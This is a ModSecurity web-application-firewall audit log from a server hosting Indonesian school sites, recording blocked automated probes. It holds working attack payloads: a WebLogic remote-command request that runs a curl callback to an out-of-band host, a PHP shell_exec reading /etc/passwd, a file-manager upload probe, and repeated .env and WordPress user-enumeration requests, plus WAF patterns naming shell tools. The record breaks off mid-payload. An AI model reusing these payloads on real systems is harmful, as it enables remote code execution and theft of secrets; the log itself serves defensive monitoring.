ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa68d44b-Z-- --54026943-A-- [21/May/2025:14:55:33 +0700] aC2G9Rpv_mIXt2pDBOoHkwAAAMM 103.236.140.4 42768 103.236.140.4 8181 --54026943-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0mbkqa4kqtm561jt3n063p17ouzafke6.oast.fun X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788833 --54026943-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --54026943-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54026943-E-- --54026943-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747814133194242 1817 (- - -) Stopwatch2: 1747814133194242 1817; combined=698, p1=347, p2=325, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54026943-Z-- --03ca7c3c-A-- [21/May/2025:14:55:33 +0700] aC2G9Rpv_mIXt2pDBOoHlAAAAMI 103.236.140.4 42776 103.236.140.4 8181 --03ca7c3c-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Content-Type: x-application/hessian X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788836 --03ca7c3c-C-- cH --03ca7c3c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --03ca7c3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747814133199111 3279 (- - -) Stopwatch2: 1747814133199111 3279; combined=2195, p1=463, p2=1658, p3=23, p4=26, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03ca7c3c-Z-- --f3cdad48-A-- [21/May/2025:15:08:55 +0700] aC2KF3ZGSt58M5vv3glzDgAAABY 103.236.140.4 43432 103.236.140.4 8181 --f3cdad48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 Accept-Charset: utf-8 --f3cdad48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cdad48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747814935030962 791 (- - -) Stopwatch2: 1747814935030962 791; combined=348, p1=308, p2=0, p3=0, p4=0, p5=40, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cdad48-Z-- --58064f4c-A-- [21/May/2025:15:26:42 +0700] aC2OQnZGSt58M5vv3gmBsAAAABA 103.236.140.4 44496 103.236.140.4 8181 --58064f4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.191.157.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.191.157.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --58064f4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58064f4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747816002625188 2677 (- - -) Stopwatch2: 1747816002625188 2677; combined=1157, p1=375, p2=756, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58064f4c-Z-- --47258661-A-- [21/May/2025:15:30:00 +0700] aC2PCCioYDAgD0WHUjS23gAAAEI 103.236.140.4 46920 103.236.140.4 8181 --47258661-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.69.144.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.69.144.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47258661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47258661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747816200515450 3244 (- - -) Stopwatch2: 1747816200515450 3244; combined=1479, p1=484, p2=965, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47258661-Z-- --c42b8352-A-- [21/May/2025:16:01:11 +0700] aC2WVyioYDAgD0WHUjTAcQAAAE4 103.236.140.4 41334 103.236.140.4 8181 --c42b8352-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --c42b8352-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c42b8352-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747818071360277 654 (- - -) Stopwatch2: 1747818071360277 654; combined=242, p1=210, p2=0, p3=0, p4=0, p5=32, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c42b8352-Z-- --f60dd16b-A-- [21/May/2025:16:01:16 +0700] aC2WXBpv_mIXt2pDBOojJAAAAMs 103.236.140.4 41426 103.236.140.4 8181 --f60dd16b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Charset: utf-8 --f60dd16b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f60dd16b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747818076738679 802 (- - -) Stopwatch2: 1747818076738679 802; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f60dd16b-Z-- --5e4aad32-A-- [21/May/2025:16:41:11 +0700] aC2ft4v3pT1iV0OxjLQRMQAAAIQ 103.236.140.4 44002 103.236.140.4 8181 --5e4aad32-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.206.169.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --5e4aad32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e4aad32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747820471940161 1020 (- - -) Stopwatch2: 1747820471940161 1020; combined=393, p1=341, p2=0, p3=0, p4=0, p5=52, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e4aad32-Z-- --9da22e2d-A-- [21/May/2025:16:41:33 +0700] aC2fzXZGSt58M5vv3gmekwAAAAw 103.236.140.4 44274 103.236.140.4 8181 --9da22e2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; INE-LX2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --9da22e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9da22e2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747820493112820 842 (- - -) Stopwatch2: 1747820493112820 842; combined=378, p1=344, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9da22e2d-Z-- --8f1d0667-A-- [21/May/2025:16:43:33 +0700] aC2gRYv3pT1iV0OxjLQR0AAAAIc 103.236.140.4 45724 103.236.140.4 8181 --8f1d0667-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15 Accept-Charset: utf-8 --8f1d0667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f1d0667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747820613962618 636 (- - -) Stopwatch2: 1747820613962618 636; combined=261, p1=215, p2=0, p3=0, p4=0, p5=46, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1d0667-Z-- --a7761356-A-- [21/May/2025:16:47:19 +0700] aC2hJ4v3pT1iV0OxjLQS3AAAAIQ 103.236.140.4 48428 103.236.140.4 8181 --a7761356-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.132.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.132.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a7761356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7761356-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747820839070667 2910 (- - -) Stopwatch2: 1747820839070667 2910; combined=1254, p1=412, p2=810, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7761356-Z-- --de7e412f-A-- [21/May/2025:16:58:01 +0700] aC2jqXZGSt58M5vv3gmkqgAAAAY 103.236.140.4 56206 103.236.140.4 8181 --de7e412f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de7e412f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de7e412f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821481478071 2799 (- - -) Stopwatch2: 1747821481478071 2799; combined=1159, p1=406, p2=725, p3=0, p4=0, p5=28, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de7e412f-Z-- --58ea331b-A-- [21/May/2025:16:59:44 +0700] aC2kECioYDAgD0WHUjTYogAAAFc 103.236.140.4 57756 103.236.140.4 8181 --58ea331b-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164789266 --58ea331b-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --58ea331b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58ea331b-E-- --58ea331b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821584540479 3678 (- - -) Stopwatch2: 1747821584540479 3678; combined=2509, p1=385, p2=2096, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58ea331b-Z-- --4b8cf92c-A-- [21/May/2025:16:59:44 +0700] aC2kEHZGSt58M5vv3gmlLgAAAAA 103.236.140.4 57770 103.236.140.4 8181 --4b8cf92c-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474793 --4b8cf92c-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --4b8cf92c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b8cf92c-E-- --4b8cf92c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821584555449 1890 (- - -) Stopwatch2: 1747821584555449 1890; combined=596, p1=389, p2=181, p3=0, p4=0, p5=26, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b8cf92c-Z-- --1b69a90e-A-- [21/May/2025:16:59:44 +0700] aC2kEHZGSt58M5vv3gmlLQAAAAk 103.236.140.4 57762 103.236.140.4 8181 --1b69a90e-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Content-Type: x-application/hessian X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164789269 --1b69a90e-C-- cH --1b69a90e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b69a90e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747821584553838 3901 (- - -) Stopwatch2: 1747821584553838 3901; combined=2312, p1=498, p2=1739, p3=23, p4=27, p5=25, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b69a90e-Z-- --a76a1020-A-- [21/May/2025:16:59:44 +0700] aC2kEHZGSt58M5vv3gmlLwAAABY 103.236.140.4 57774 103.236.140.4 8181 --a76a1020-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0mbkqa4kqtm561jt3n0aor8371wiwy64.oast.fun X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 167545917 --a76a1020-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) 